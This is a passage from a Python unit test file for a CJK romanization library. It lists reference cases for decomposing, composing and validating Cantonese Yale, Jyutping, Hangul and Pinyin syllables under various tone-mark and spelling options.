(u'gwóngjaù', [u'gwóng', u'jaù']), # wrong placement of tone
(u'GWÓNGJÀUWÁ', [u'GWÓNG', u'JÀU', u'WÁ']),
(u'sīsísisìhsíhsihsīksiksihk', [u'sī', u'sí', u'si', u'sìh', u'síh',
u'sih', u'sīk', u'sik', u'sihk']),
(u'SÌSÍSISÌHSÍHSIHSĪKSIKSIHK', [u'SÌ', u'SÍ', u'SI', u'SÌH', u'SÍH',
u'SIH', u'SĪK', u'SIK', u'SIHK']),
]),
({'toneMarkType': 'numbers'}, [
(u'gwong2jau1wa2', [u'gwong2', u'jau1', u'wa2']),
(u'yut6yu5', [u'yut6', u'yu5']),
(u'nei5hou2', [u'nei5', u'hou2']),
(u'GWONG2JAU1WA2', [u'GWONG2', u'JAU1', u'WA2']),
(u'si1si2si3si4si5si6sik1sik3sik6', [u'si1', u'si2', u'si3', u'si4',
u'si5', u'si6', u'sik1', u'sik3', u'sik6']),
(u'SI1SI2SI3SI4SI5SI6SIK1SIK3SIK6', [u'SI1', u'SI2', u'SI3', u'SI4',
u'SI5', u'SI6', u'SIK1', u'SIK3', u'SIK6']),
]),
({'strictDiacriticPlacement': True}, [
(u'gwóngjàuwá', [u'gwóng', u'jàu', u'wá']),
(u'yuhtyúh', [u'yuht', u'yúh']),
(u'néihhóu', [u'néih', u'hóu']),
(u'gwóngjaù', [u'gwóngjaù']), # wrong placement of tone
])
]
COMPOSITION_REFERENCES = [
({}, [
([u'gwóng', u'jàu', u'wá'], u'gwóngjàuwá'),
([u'yuht', u'yúh'], u'yuhtyúh'),
([u'gwóng', u'jaù'], u'gwóngjaù'), # wrong placement of tone
([u'GWÓNG', u'JÀU', u'WÁ'], u'GWÓNGJÀUWÁ'),
([u'sī', u'sí', u'si', u'sìh', u'síh', u'sih', u'sīk', u'sik',
u'sihk'], u'sīsísisìhsíhsihsīksiksihk'),
([u'SÌ', u'SÍ', u'SI', u'SÌH', u'SÍH', u'SIH', u'SĪK', u'SIK',
u'SIHK'], u'SÌSÍSISÌHSÍHSIHSĪKSIKSIHK'),
]),
({'toneMarkType': 'numbers'}, [
([u'gwong2', u'jau1', u'wa2'], u'gwong2jau1wa2'),
([u'yut6', u'yu5'], u'yut6yu5'),
([u'GWONG2', u'JAU1', u'WA2'], u'GWONG2JAU1WA2'),
([u'si1', u'si2', u'si3', u'si4', u'si5', u'si6', u'sik1', u'sik3',
u'sik6'], u'si1si2si3si4si5si6sik1sik3sik6'),
([u'SI1', u'SI2', u'SI3', u'SI4', u'SI5', u'SI6', u'SIK1', u'SIK3',
u'SIK6'], u'SI1SI2SI3SI4SI5SI6SIK1SIK3SIK6'),
]),
({'strictDiacriticPlacement': True}, [
([u'gwóng', u'jàu', u'wá'], u'gwóngjàuwá'),
([u'yuht', u'yúh'], u'yuhtyúh'),
([u'gwóng', u'jaù'], exception.CompositionError),
# wrong placement of tone
([u'jau\u0300', u'gwóng'], exception.CompositionError),
# wrong placement of tone
]),
({'toneMarkType': 'numbers', 'missingToneMark': 'ignore'}, [
([u'gwong2', u'jau1', u'wa2'], u'gwong2jau1wa2'),
([u'gwong2', u'jau', u'wa2'], exception.CompositionError),
])
]
READING_ENTITY_REFERENCES = [
({}, [
(u'wā', True),
(u'gwóng', True),
(u'jàu', True),
(u'wá', True),
(u'néih', True),
(u'yuht', True),
(u'gwong', True),
(u'wa\u0304', True),
(u'jaù', True),
(u'gwongh', True),
(u'wáa', False),
(u'GWÓNG', True),
(u'SIK', True),
(u'bàt', False), # stop tone
(u'bat4', False), # stop tone
]),
({'strictDiacriticPlacement': True}, [
(u'wā', True),
(u'gwóng', True),
(u'jàu', True),
(u'wá', True),
(u'néih', True),
(u'yuht', True),
(u'gwong', True),
(u'wa\u0304', True),
(u'jaù', False),
(u'gwongh', False),
(u'wáa', False),
(u'GWÓNG', True),
(u'SIK', True),
(u'bàt', False), # stop tone
(u'bat4', False), # stop tone
]),
({'case': 'lower'}, [
(u'wā', True),
(u'gwóng', True),
(u'jàu', True),
(u'wá', True),
(u'néih', True),
(u'yuht', True),
(u'gwong', True),
(u'wa\u0304', True),
(u'jaù', True),
(u'gwongh', True),
(u'wáa', False),
(u'GWÓNG', False),
(u'SIK', False),
(u'bàt', False), # stop tone
(u'bat4', False), # stop tone
]),
]
GUESS_DIALECT_REFERENCES = [
(u"Mh", {'toneMarkType': 'diacritics'}),
(u"YUHT", {'toneMarkType': 'diacritics'}),
(u"yuht", {'toneMarkType': 'diacritics'}),
(u"wā", {'toneMarkType': 'diacritics'}),
(u"gwong2", {'toneMarkType': 'numbers'}),
]
class JyutpingOperatorConsistencyTest(ReadingOperatorConsistencyTest,
unittest.TestCase):
READING_NAME = 'Jyutping'
DIALECTS = crossDict(
[{}, {'missingToneMark': 'ignore'}, {'toneMarkType': 'none'}],
[{}, {'strictSegmentation': True}],
[{}, {'case': 'lower'}],
)
# TODO
class JyutpingOperatorReferenceTest(ReadingOperatorReferenceTest,
unittest.TestCase):
READING_NAME = 'Jyutping'
DECOMPOSITION_REFERENCES = [
({}, [
(u'gwong2zau1waa2', [u'gwong2', u'zau1', u'waa2']),
]),
]
COMPOSITION_REFERENCES = [
({}, [
([u'gwong2', u'zau1', u'waa2'], u'gwong2zau1waa2'),
]),
({'missingToneMark': 'ignore'}, [
([u'gwong2', u'zau1', u'waa2'], u'gwong2zau1waa2'),
([u'gwong2', u'zau', u'waa2'], exception.CompositionError),
]),
]
READING_ENTITY_REFERENCES = [
({}, [
(u'si1', True),
(u'si2', True),
(u'si3', True),
(u'si4', True),
(u'si5', True),
(u'si6', True),
(u'sik1', True),
(u'sik2', False), # stop tone
(u'sik3', True),
(u'sik4', False), # stop tone
(u'sik5', False), # stop tone
(u'sik6', True),
]),
]
class HangulOperatorConsistencyTest(ReadingOperatorConsistencyTest,
unittest.TestCase):
READING_NAME = 'Hangul'
# TODO
class HangulOperatorReferenceTest(ReadingOperatorReferenceTest,
unittest.TestCase):
READING_NAME = 'Hangul'
DECOMPOSITION_REFERENCES = [
({}, [
(u"한글은 한국어의 고유", [u"한", u"글", u"은", u" ",
u"한", u"국", u"어", u"의", u" ", u"고", u"유"]),
]),
]
COMPOSITION_REFERENCES = [
({}, [
([u"한", u"글", u"은", u" ", u"한", u"국", u"어", u"의", u" ", u"고",
u"유"], u"한글은 한국어의 고유"),
]),
]
READING_ENTITY_REFERENCES = []
class HiraganaOperatorConsistencyTest(ReadingOperatorConsistencyTest,
unittest.TestCase):
READING_NAME = 'Hiragana'
# TODO
#class HiraganaOperatorReferenceTest(ReadingOperatorReferenceTest,
#unittest.TestCase):
#READING_NAME = 'Hiragana'
#DECOMPOSITION_REFERENCES = []
#COMPOSITION_REFERENCES = []
#READING_ENTITY_REFERENCES = []
class KatakanaOperatorConsistencyTest(ReadingOperatorConsistencyTest,
unittest.TestCase):
READING_NAME = 'Katakana'
# TODO
#class KatakanaOperatorReferenceTest(ReadingOperatorReferenceTest,
#unittest.TestCase):
#READING_NAME = 'Katakana'
#DECOMPOSITION_REFERENCES = []
#COMPOSITION_REFERENCES = []
#READING_ENTITY_REFERENCES = []
class KanaOperatorConsistencyTest(ReadingOperatorConsistencyTest,
unittest.TestCase):
READING_NAME = 'Kana'
# TODO
#class KanaOperatorReferenceTest(ReadingOperatorReferenceTest,
#unittest.TestCase):
#READING_NAME = 'Kana'
#DECOMPOSITION_REFERENCES = []
#COMPOSITION_REFERENCES = []
#READING_ENTITY_REFERENCES = []
class PinyinOperatorConsistencyTest(ReadingOperatorConsistencyTest,
unittest.TestCase):
READING_NAME = 'Pinyin'
def _noToneApostropheRule(operatorInst, precedingEntity, followingEntity):
return precedingEntity and precedingEntity[0].isalpha() \
and not precedingEntity[-1].isdigit() \
and followingEntity[0].isalpha()
noToneApostropheRule = staticmethod(_noToneApostropheRule)
DIALECTS = crossDict(
[{}, {'toneMarkType': 'numbers'},
{'toneMarkType': 'numbers', 'missingToneMark': 'fifth'},
{'toneMarkType': 'numbers', 'missingToneMark': 'ignore'},
{'toneMarkType': 'numbers', 'yVowel': 'v'},
{'toneMarkType': 'numbers', 'yVowel': 'uu'},
{'toneMarkType': 'none'},
{'pinyinDiacritics': (u'\u0304', u'\u0301', u'\u0306', u'\u0300')},
{'pinyinDiacritics': (u'\u0304', u'\u0301', u'\u0302', u'\u0300')},
{'strictDiacriticPlacement': True}],
[{}, {'pinyinApostrophe': u'’'}],
[{}, {'pinyinApostropheFunction': _noToneApostropheRule}],
[{}, {'erhua': 'oneSyllable'}, {'erhua': 'ignore'}],
[{}, {'strictSegmentation': True}],
[{}, {'case': 'lower'}],
[{}, {'shortenedLetters': True}],
)
def cleanDecomposition(self, decomposition, reading, **options):
if not hasattr(self, '_operators'):
self._operators = []
for operatorReading, operatorOptions, op in self._operators:
if reading == operatorReading and options == operatorOptions:
break
else:
op = self.f.createReadingOperator(reading, **options)
self._operators.append((reading, options, op))
return op.removeApostrophes(decomposition)
class PinyinOperatorReferenceTest(ReadingOperatorReferenceTest,
unittest.TestCase):
READING_NAME = 'Pinyin'
DECOMPOSITION_REFERENCES = [
({}, [
(u"tiān'ānmén", [u"tiān", "'", u"ān", u"mén"]),
("xian", ["xian"]),
(u"xīān", [u"xī", u"ān"]),
(u"tian1'an1men2", [u"tian1", "'", u"an1", u"men2"]),
(u"tian'anmen", [u"tian", "'", u"an", u"men"]),
(u"xi1an1", [u"xi1", u"an1"]),
(u"lao3tou2r5", [u"lao3", u"tou2", u"r5"]),
(u"lao3tour2", [u"lao3", u"tour2"]),
(u"er2hua4yin1", [u"er2", u"hua4", u"yin1"]),
(u"peínǐ", [u'peí', u'nǐ']), # wrong placement of tone
(u"hónglùo", [u'hóng', u'lùo']), # wrong placement of tone
(u"Tiān'ānmén", [u"Tiān", "'", u"ān", u"mén"]),
(u"TIĀN'ĀNMÉN", [u"TIĀN", "'", u"ĀN", u"MÉN"]),
("XIAN", ["XIAN"]),
(u"TIAN1'AN1MEN2", [u"TIAN1", "'", u"AN1", u"MEN2"]),
(u'tiananmen', exception.DecompositionError),
(u'zhīshi', [u'zhī', 'shi']),
]),
({'toneMarkType': 'numbers'}, [
(u"tiān'ānmén", [u"tiān", "'", u"ānmén"]),
("xian", ["xian"]),
(u"xīān", [u"xīān"]),
(u"tian1'an1men2", [u"tian1", "'", u"an1", u"men2"]),
(u"tian'anmen", [u"tian", "'", u"an", u"men"]),
(u"xi1an1", [u"xi1", u"an1"]),
(u"lao3tou2r5", [u"lao3", u"tou2", u"r5"]),
(u"lao3tour2", [u"lao3", u"tour2"]),
(u"er2hua4yin1", [u"er2", u"hua4", u"yin1"]),
(u"peínǐ", [u'peínǐ']), # wrong placement of tone
(u"hónglùo", [u'hónglùo']), # wrong placement of tone
(u"Tiān'ānmén", [u"Tiān", "'", u"ānmén"]),
(u"TIĀN'ĀNMÉN", [u"TIĀN", "'", u"ĀNMÉN"]),
("XIAN", ["XIAN"]),
(u"TIAN1'AN1MEN2", [u"TIAN1", "'", u"AN1", u"MEN2"]),
]),
({'toneMarkType': 'numbers', 'missingToneMark': 'ignore'}, [
(u"tiān'ānmén", [u"tiān", "'", u"ānmén"]),
("xian", ["xian"]),
(u"xīān", [u"xīān"]),
(u"tian1'an1men2", [u"tian1", "'", u"an1", u"men2"]),
(u"tian'anmen", [u"tian", "'", u"anmen"]),
(u"xi1an1", [u"xi1", u"an1"]),
(u"lao3tou2r5", [u"lao3", u"tou2", u"r5"]),
(u"lao3tour2", [u"lao3", u"tour2"]),
(u"er2hua4yin1", [u"er2", u"hua4", u"yin1"]),
(u"peínǐ", [u'peínǐ']), # wrong placement of tone
(u"hónglùo", [u'hónglùo']), # wrong placement of tone
(u"Tiān'ānmén", [u"Tiān", "'", u"ānmén"]),
(u"TIĀN'ĀNMÉN", [u"TIĀN", "'", u"ĀNMÉN"]),
("XIAN", ["XIAN"]),
(u"TIAN1'AN1MEN2", [u"TIAN1", "'", u"AN1", u"MEN2"]),
]),
({'erhua': 'oneSyllable'}, [
(u"tiān'ānmén", [u"tiān", "'", u"ān", u"mén"]),
("xian", ["xian"]),
(u"xīān", [u"xī", u"ān"]),
(u"tian1'an1men2", [u"tian1", "'", u"an1", u"men2"]),
(u"tian'anmen", [u"tian", "'", u"an", u"men"]),
(u"xi1an1", [u"xi1", u"an1"]),
(u"lao3tou2r5", [u"lao3", u"tou2", u"r5"]),
(u"lao3tour2", [u"lao3", u"tour2"]),
(u"er2hua4yin1", [u"er2", u"hua4", u"yin1"]),
(u"peínǐ", [u'peí', u'nǐ']), # wrong placement of tone
(u"hónglùo", [u'hóng', u'lùo']), # wrong placement of tone
(u"Tiān'ānmén", [u"Tiān", "'", u"ān", u"mén"]),
(u"TIĀN'ĀNMÉN", [u"TIĀN", "'", u"ĀN", u"MÉN"]),
("XIAN", ["XIAN"]),
(u"TIAN1'AN1MEN2", [u"TIAN1", "'", u"AN1", u"MEN2"]),
]),
({'strictDiacriticPlacement': True}, [
(u"tiān'ānmén", [u"tiān", "'", u"ān", u"mén"]),
("xian", ["xian"]),
(u"xīān", [u"xī", u"ān"]),
(u"tian1'an1men2", [u"tian1", "'", u"an1", u"men2"]),
(u"tian'anmen", [u"tian", "'", u"an", u"men"]),
(u"xi1an1", [u"xi1", u"an1"]),
(u"lao3tou2r5", [u"lao3", u"tou2", u"r5"]),
(u"lao3tour2", [u"lao3", u"tour2"]),
(u"er2hua4yin1", [u"er2", u"hua4", u"yin1"]),
(u"peínǐ", [u'peínǐ']), # wrong placement of tone
(u"hónglùo", [u'hóng', u'lù', u'o']), # wrong placement of tone
(u"Tiān'ānmén", [u"Tiān", "'", u"ān", u"mén"]),
(u"TIĀN'ĀNMÉN", [u"TIĀN", "'", u"ĀN", u"MÉN"]),
("XIAN", ["XIAN"]),
(u"TIAN1'AN1MEN2", [u"TIAN1", "'", u"AN1", u"MEN2"]),
]),
({'case': 'lower'}, [
(u"tiān'ānmén", [u"tiān", "'", u"ān", u"mén"]),
("xian", ["xian"]),
(u"xīān", [u"xī", u"ān"]),
(u"tian1'an1men2", [u"tian1", "'", u"an1", u"men2"]),
(u"tian'anmen", [u"tian", "'", u"an", u"men"]),
(u"xi1an1", [u"xi1", u"an1"]),
(u"lao3tou2r5", [u"lao3", u"tou2", u"r5"]),
(u"lao3tour2", [u"lao3", u"tour2"]),
(u"er2hua4yin1", [u"er2", u"hua4", u"yin1"]),
(u"peínǐ", [u'peí', u'nǐ']), # wrong placement of tone
(u"hónglùo", [u'hóng', u'lùo']), # wrong placement of tone
(u"Tiān'ānmén", [u"Tiān", "'", u"ān", u"mén"]),
(u"TIĀN'ĀNMÉN", [u"TIĀN", "'", u"ĀNMÉN"]),
("XIAN", ["XIAN"]),
(u"TIAN1'AN1MEN2", [u"TIAN1", "'", u"AN1", u"MEN2"]),
]),
({'toneMarkType': 'numbers', 'yVowel': 'v'}, [
(u'nv3hai2', [u'nv3', u'hai2']),
(u'nvhai', [u'nv', 'hai']),
(u'nü3hai2', [u'nü3', u'hai2']),
(u'nühai', [u'nühai']),
]),
]
COMPOSITION_REFERENCES = [
({}, [
([u"tiān", u"ān", u"mén"], u"tiān'ānmén"),
(["xian"], "xian"),
([u"xī", u"ān"], u"xī'ān"),
([u"tian1", "'", u"an1", u"men2"], u"tian1'an1men2"),
([u"tian1", u"an1", u"men2"], u"tian1an1men2"),
([u"tian", u"an", u"men"], u"tian'anmen"),
([u"xi1", u"an1"], u"xi1an1"),
([u"lao3", u"tou2", u"r5"], u"lao3tou2r5"),
([u"lao3", u"tour2"], u"lao3tour2"),
([u"lao3", u"angr2"], u"lao3angr2"),
([u"lao3", u"ang2", u"r5"], u"lao3ang2r5"),
([u"er2", u"hua4", u"yin1"], u"er2hua4yin1"),
([u'peí', u'nǐ'], u"peínǐ"), # wrong placement of tone
([u'hóng', u'lùo'], u"hónglùo"), # wrong placement of tone
([u"TIĀN", u"ĀN", u"MÉN"], u"TIĀN'ĀNMÉN"),
([u"TIAN1", u"AN1", u"MEN2"], u"TIAN1AN1MEN2", ),
([u"e", u"r"], u"e'r"),
([u"ti", u"anr"], exception.CompositionError),
([u"chang", u"an"], u"chang'an"),
([u"ĉaŋ", u"an"], exception.CompositionError),
]),
({'toneMarkType': 'numbers'}, [
([u"tiān", u"ān", u"mén"], u"tiānānmén"),
(["xian"], "xian"),
([u"xī", u"ān"], u"xīān"),
([u"tian1", "'", u"an1", u"men2"], u"tian1'an1men2"),
([u"tian1", u"an1", u"men2"], u"tian1'an1men2"),
([u"tian", u"an", u"men"], u"tian'anmen"),
([u"xi1", u"an1"], u"xi1'an1"),
([u"lao3", u"tou2", u"r5"], u"lao3tou2r5"),
([u"lao3", u"tour2"], u"lao3tour2"),
([u"lao3", u"angr2"], u"lao3angr2"),
([u"lao3", u"ang2", u"r5"], u"lao3'ang2r5"),
([u"er2", u"hua4", u"yin1"], u"er2hua4yin1"),
([u'peí', u'nǐ'], u"peínǐ"), # wrong placement of tone
([u'hóng', u'lùo'], u"hónglùo"), # wrong placement of tone
([u"TIĀN", u"ĀN", u"MÉN"], u"TIĀNĀNMÉN"),
([u"TIAN1", u"AN1", u"MEN2"], u"TIAN1'AN1MEN2", ),
([u"e", u"r"], u"e'r"),
]),
({'toneMarkType': 'numbers', 'missingToneMark': 'ignore'}, [
([u"tiān", u"ān", u"mén"], u"tiānānmén"),
(["xian"], "xian"),
([u"xī", u"ān"], u"xīān"),
([u"tian1", "'", u"an1", u"men2"], u"tian1'an1men2"),
([u"tian1", u"an1", u"men2"], u"tian1'an1men2"),
([u"tian", u"an", u"men"], u"tiananmen"),
([u"xi1", u"an1"], u"xi1'an1"),
([u"lao3", u"tou2", u"r5"], u"lao3tou2r5"),
([u"lao3", u"tour2"], u"lao3tour2"),
([u"lao3", u"angr2"], u"lao3angr2"),
([u"lao3", u"ang2", u"r5"], u"lao3'ang2r5"),
([u"er2", u"hua4", u"yin1"], u"er2hua4yin1"),
([u'peí', u'nǐ'], u"peínǐ"), # wrong placement of tone
([u'hóng', u'lùo'], u"hónglùo"), # wrong placement of tone
([u"TIĀN", u"ĀN", u"MÉN"], u"TIĀNĀNMÉN"),
([u"TIAN1", u"AN1", u"MEN2"], u"TIAN1'AN1MEN2", ),
([u"e5", u"r5"], u"e5'r5"),
]),
({'erhua': 'oneSyllable'}, [
([u"tiān", u"ān", u"mén"], u"tiān'ānmén"),
(["xian"], "xian"),
([u"xī", u"ān"], u"xī'ān"),
([u"tian1", "'", u"an1", u"men2"], u"tian1'an1men2"),
([u"tian1", u"an1", u"men2"], u"tian1an1men2"),
([u"tian", u"an", u"men"], u"tian'anmen"),
([u"xi1", u"an1"], u"xi1an1"),
([u"lao3", u"tou2", u"r5"], u"lao3tou2r5"),
([u"lao3", u"tour2"], u"lao3tour2"),
([u"lao3", u"angr2"], u"lao3angr2"),
([u"lao3", u"ang2", u"r5"], u"lao3ang2r5"),
([u"er2", u"hua4", u"yin1"], u"er2hua4yin1"),
([u'peí', u'nǐ'], u"peínǐ"), # wrong placement of tone
([u'hóng', u'lùo'], u"hónglùo"), # wrong placement of tone
([u"TIĀN", u"ĀN", u"MÉN"], u"TIĀN'ĀNMÉN"),
([u"TIAN1", u"AN1", u"MEN2"], u"TIAN1AN1MEN2", ),
([u"e", u"r"], exception.CompositionError),
]),
({'toneMarkType': 'numbers', 'erhua': 'oneSyllable'}, [
([u"tiān", u"ān", u"mén"], u"tiānānmén"),
(["xian"], "xian"),
([u"xī", u"ān"], u"xīān"),
([u"tian1", "'", u"an1", u"men2"], u"tian1'an1men2"),
([u"tian1", u"an1", u"men2"], u"tian1'an1men2"),
([u"tian", u"an", u"men"], u"tian'anmen"),
([u"xi1", u"an1"], u"xi1'an1"),
([u"lao3", u"tou2", u"r5"], u"lao3tou2r5"),
([u"lao3", u"tour2"], u"lao3tour2"),
([u"lao3", u"angr2"], u"lao3'angr2"),
([u"lao3", u"ang2", u"r5"], u"lao3'ang2r5"),
([u"er2", u"hua4", u"yin1"], u"er2hua4yin1"),
([u'peí', u'nǐ'], u"peínǐ"), # wrong placement of tone
([u'hóng', u'lùo'], u"hónglùo"), # wrong placement of tone
([u"TIĀN", u"ĀN", u"MÉN"], u"TIĀNĀNMÉN"),
([u"TIAN1", u"AN1", u"MEN2"], u"TIAN1'AN1MEN2", ),
([u"e", u"r"], exception.CompositionError),
]),
({'strictDiacriticPlacement': True}, [
([u"tiān", u"ān", u"mén"], u"tiān'ānmén"),
(["xian"], "xian"),
([u"xī", u"ān"], u"xī'ān"),
([u"tian1", "'", u"an1", u"men2"], u"tian1'an1men2"),
([u"tian1", u"an1", u"men2"], u"tian1an1men2"),
([u"tian", u"an", u"men"], u"tian'anmen"),
([u"xi1", u"an1"], u"xi1an1"),
([u"lao3", u"tou2", u"r5"], u"lao3tou2r5"),
([u"lao3", u"tour2"], u"lao3tour2"),
([u"lao3", u"angr2"], u"lao3angr2"),
([u"lao3", u"ang2", u"r5"], u"lao3ang2r5"),
([u"er2", u"hua4", u"yin1"], u"er2hua4yin1"),
([u'peí', u'nǐ'], exception.CompositionError),
# wrong placement of tone
([u'hóng', u'lùo'], exception.CompositionError),
# wrong placement of tone
([u"TIĀN", u"ĀN", u"MÉN"], u"TIĀN'ĀNMÉN"),
([u"TIAN1", u"AN1", u"MEN2"], u"TIAN1AN1MEN2", ),
([u"e", u"r"], u"e'r"),
]),
({'toneMarkType': 'numbers', 'yVowel': 'v'}, [
([u'nv3', u'hai2'], u'nv3hai2'),
([u'nü3', u'hai2'], u'nü3hai2'),
]),
({'shortenedLetters': True}, [
([u"tiān", u"ān", u"mén"], u"tiān'ānmén"),
(["xian"], "xian"),
([u"xī", u"ān"], u"xī'ān"),
([u"tian1", "'", u"an1", u"men2"], u"tian1'an1men2"),
([u"tian1", u"an1", u"men2"], u"tian1an1men2"),
([u"tian", u"an", u"men"], u"tian'anmen"),
([u"xi1", u"an1"], u"xi1an1"),
([u"lao3", u"tou2", u"r5"], u"lao3tou2r5"),
([u"lao3", u"tour2"], u"lao3tour2"),
([u"lao3", u"angr2"], u"lao3angr2"),
([u"lao3", u"ang2", u"r5"], u"lao3ang2r5"),
([u"er2", u"hua4", u"yin1"], u"er2hua4yin1"),
([u'peí', u'nǐ'], u"peínǐ"), # wrong placement of tone
([u"TIĀN", u"ĀN", u"MÉN"], u"TIĀN'ĀNMÉN"),
([u"TIAN1", u"AN1", u"MEN2"], u"TIAN1AN1MEN2", ),
([u"e", u"r"], u"e'r"),
([u"ti", u"anr"], exception.CompositionError),
([u"chang", u"an"], exception.CompositionError),
([u"ĉaŋ", u"an"], u"ĉaŋ'an"),
]),
]
READING_ENTITY_REFERENCES = [
({}, [
(u"tiān", True),
(u"ān", True),
(u"mén", True),
(u"lào", True),
(u"xǐ", True),
(u"lü", True),
(u"ê", True),
(u"Ê", True),
(u"tian1", False),
(u"an1", False),
(u"men2", False),
(u"lao4", False),
(u"xi3", False),
(u"xian", True),
(u"ti\u0304an", True),
(u"tia\u0304n", True),
(u"laǒ", True),
(u"tīan", True),
(u"tīa", False),
(u"tiā", False),
(u"angr", False),
(u"er", True),
(u"r", True),
(u"TIĀN", True),
(u"XIAN", True),
(u"TIAN1", False),
(u"r1", False),
(u"zhī", True),
(u"tang", True),
(u"ẑī", False),
(u"taŋ", False),
(u"ề", True),
]),
({'toneMarkType': 'numbers'}, [
(u"tiān", False),
(u"ān", False),
(u"mén", False),
(u"lào", False),
(u"xǐ", False),
(u"lü", True),
(u"ê", True),
(u"tian1", True),
(u"an1", True),
(u"men2", True),
(u"lao4", True),
(u"xi3", True),
(u"xian", True),
(u"ti\u0304an", False),
(u"tia\u0304n", False),
(u"laǒ", False),
(u"tīan", False),
(u"tīa", False),
(u"tiā", False),
(u"angr", False),
(u"er", True),
(u"r", True),
(u"TIĀN", False),
(u"XIAN", True),
(u"TIAN1", True),
(u"r1", False),
(u"ề", False),
]),
({'toneMarkType': 'numbers', 'missingToneMark': 'ignore'}, [
(u"tiān", False),
(u"ān", False),
(u"mén", False),
(u"lào", False),
(u"xǐ", False),
(u"lü", False),
(u"ê", False),
(u"tian1", True),
(u"an1", True),
(u"men2", True),
(u"lao4", True),
(u"xi3", True),
(u"xian", False),
(u"ti\u0304an", False),
(u"tia\u0304n", False),
(u"laǒ", False),
(u"tīan", False),
(u"tīa", False),
(u"tiā", False),
(u"angr", False),
(u"er", False),
(u"r", False),
(u"TIĀN", False),
(u"XIAN", False),
(u"TIAN1", True),
(u"r1", False),
(u"ề", False),
]),
({'erhua': 'oneSyllable'}, [
(u"tiān", True),
(u"ān", True),
(u"mén", True),
(u"lào", True),
(u"xǐ", True),
(u"lü", True),
(u"ê", True),
(u"tian1", False),
(u"an1", False),
(u"men2", False),
(u"lao4", False),
(u"xi3", False),
(u"xian", True),
(u"ti\u0304an", True),
(u"tia\u0304n", True),
(u"laǒ", True),
(u"tīan", True),
(u"tīa", False),
(u"tiā", False),
(u"angr", True),
(u"er", True),
(u"r", False),
(u"TIĀN", True),
(u"XIAN", True),
(u"TIAN1", False),
(u"r1", False),
(u"ề", True),
]),
({'strictDiacriticPlacement': True}, [
(u"tiān", True),
(u"ān", True),
(u"mén", True),
(u"lào", True),
(u"xǐ", True),
(u"lü", True),
(u"ê", True),
(u"tian1", False),
(u"an1", False),
(u"men2", False),
(u"lao4", False),
(u"xi3", False),
(u"xian", True),
(u"tia\u0304n", True),
(u"ti\u0304an", False),
(u"laǒ", False),
(u"tīan", False),
(u"tīa", False),
(u"tiā", False),
(u"angr", False),
(u"er", True),
(u"r", True),
(u"TIĀN", True),
(u"XIAN", True),
(u"TIAN1", False),
(u"r1", False),
(u"ề", True),
]),
({'case': 'lower'}, [
(u"tiān", True),
(u"ān", True),
(u"mén", True),
(u"lào", True),
(u"xǐ", True),
(u"lü", True),
(u"ê", True),
(u"tian1", False),
(u"an1", False),
(u"men2", False),
(u"lao4", False),
(u"xi3", False),
(u"xian", True),
(u"ti\u0304an", True),
(u"tia\u0304n", True),
(u"laǒ", True),
(u"tīan", True),
(u"tīa", False),
(u"tiā", False),
(u"angr", False),
(u"er", True),
(u"r", True),
(u"TIĀN", False),
(u"XIAN", False),
(u"TIAN1", False),
(u"r1", False),
(u"ề", True),
]),
({'toneMarkType': 'numbers', 'yVowel': 'v'}, [
(u"tiān", False),
(u"ān", False),
(u"mén", False),
(u"lào", False),
(u"xǐ", False),
(u"lü", False),
(u"lv", True),
(u"ê", True),
(u"tian1", True),
(u"an1", True),
(u"men2", True),
(u"lao4", True),
(u"xi3", True),
(u"xian", True),
(u"ti\u0304an", False),
(u"tia\u0304n", False),
(u"laǒ", False),
(u"tīan", False),
(u"tīa", False),
(u"tiā", False),
(u"angr", False),
(u"er", True),
(u"r", True),
(u"TIĀN", False),
(u"XIAN", True),
(u"TIAN1", True),
(u"r1", False),
(u"ề", False),
]),
({'shortenedLetters': True}, [
(u"tiān", True),
(u"ān", True),
(u"mén", True),
(u"lào", True),
(u"xǐ", True),
(u"lü", True),
(u"ê", True),
(u"Ê", True),
(u"tian1", False),
(u"an1", False),
(u"men2", False),
(u"lao4", False),
(u"xi3", False),
(u"xian", True),
(u"ti\u0304an", True),
(u"tia\u0304n", True),
(u"laǒ", True),
(u"tīan", True),
(u"tīa", False),
(u"tiā", False),
(u"angr", False),
(u"er", True),
(u"r", True),
(u"TIĀN", True),
(u"XIAN", True),
(u"TIAN1", False),
(u"r1", False),
(u"zhī", False),
(u"tang", False),
(u"ẑī", True),
(u"taŋ", True),
(u"ŜAŊ", True),
(u"ề", True),
]),
({'pinyinDiacritics': (u'\u0304', u'\u0301', u'\u0302', u'\u0300')}, [
(u"tiān", True),
(u"ān", True),
(u"mén", True),
(u"lào", True),
(u"xǐ", False),
(u"lü", True),
(u"ê", True),
(u"Ê", True),
(u"tian1", False),
(u"an1", False),
(u"men2", False),
(u"lao4", False),
(u"xi3", False),
(u"xian", True),
(u"ti\u0304an", True),
(u"tia\u0304n", True),
(u"laǒ", False),
(u"tīan", True),
(u"tīa", False),
(u"tiā", False),
(u"angr", False),
(u"er", True),
(u"r", True),
(u"TIĀN", True),
(u"XIAN", True),
(u"TIAN1", False),
(u"r1", False),
(u"zhī", True),
(u"tang", True),
(u"ẑī", False),
(u"taŋ", False),
(u"ề", False),
]),
]
STRICT_DECOMPOSITION_REFERENCES = [
({}, [
([u"tiān", "'", u"ān", u"mén"], True),
([u"tiān", u"ān", u"mén"], False),
([u"chan", u"gan"], True),
(["xian"], True),
([u"tian1", u"an1", u"men2"], True),
([u"tian", u"an", u"men"], False),
([u"tian", "'", u"an", u"men"], True),
([u"lao3", u"angr2"], True),
([u"lao3", u"ang2", u"r5"], True),
([u"TIĀN", u"ĀN", u"MÉN"], False),
([u"TIAN1", u"AN1", u"MEN2"], True),
]),
({'toneMarkType': 'numbers'}, [
([u"tiān", "'", u"ān", u"mén"], True),
([u"tiān", u"ān", u"mén"], True),
([u"chan", u"gan"], True),
(["xian"], True),
([u"tian1", u"an1", u"men2"], False),
([u"tian", u"an", u"men"], False),
([u"tian", "'", u"an", u"men"], True),
([u"lao3", u"angr2"], True),
([u"lao3", u"ang2", u"r5"], False),
([u"TIĀN", u"ĀN", u"MÉN"], True),
([u"TIAN1", u"AN1", u"MEN2"], False),
]),
({'toneMarkType': 'numbers', 'missingToneMark': 'ignore'}, [
([u"tiān", "'", u"ān", u"mén"], True),
([u"tiān", u"ān", u"mén"], True),
([u"chan", u"gan"], True),
(["xian"], True),
([u"tian1", u"an1", u"men2"], False),
([u"tian", u"an", u"men"], True),
([u"tian", "'", u"an", u"men"], True),
([u"lao3", u"angr2"], True),
([u"lao3", u"ang2", u"r5"], False),
([u"TIĀN", u"ĀN", u"MÉN"], True),
